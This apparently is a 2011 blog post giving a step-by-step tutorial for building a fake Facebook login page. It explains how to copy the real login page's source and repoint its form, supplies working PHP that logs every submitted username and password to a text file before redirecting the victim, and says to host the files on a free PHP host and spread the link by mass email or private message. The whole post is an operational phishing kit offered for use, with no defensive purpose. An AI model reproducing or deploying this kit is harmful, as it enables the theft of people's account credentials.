Face Book Hacking (Fake Page)

Wednesday 30 March 2011

1) Go to: www.facebook.com/login.php
Right click on a white space and press view source code.
Copy it all and paste it in notepad.

2) Search in notpad (Crtl+f) for 'action'.
Change it to action="next.php"
Then on the left change: method="get" instead of "POST"

You would have something like this:
<form method="get" action="next.php" id="login_form">

Save it as index.php (save as unicode)

3) Now we need to make a next.php so:
open notepad again and paste this code:

:<?php
header("Location: http://www.facebook.com/hack.lessons ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

And save it as next.php
For safety: change passwords.txt to login.txt

Now make in notepad a login.txt file.
Save as login.txt and leave blank.

4) Congratiulations! You made you're own facebook phisher!!!
Now upload those 3 files (index.php ;next.php and login.txt) on a hosting site.
(they must support php!)

I suggest to use freeho sti a.co m  (remove spaces)

5) Send the link to some e-mail-accounts.
You can search for 'mass-mails' to have some e-mails.
or instead send the link via private msg...

0 comments:

Post a Comment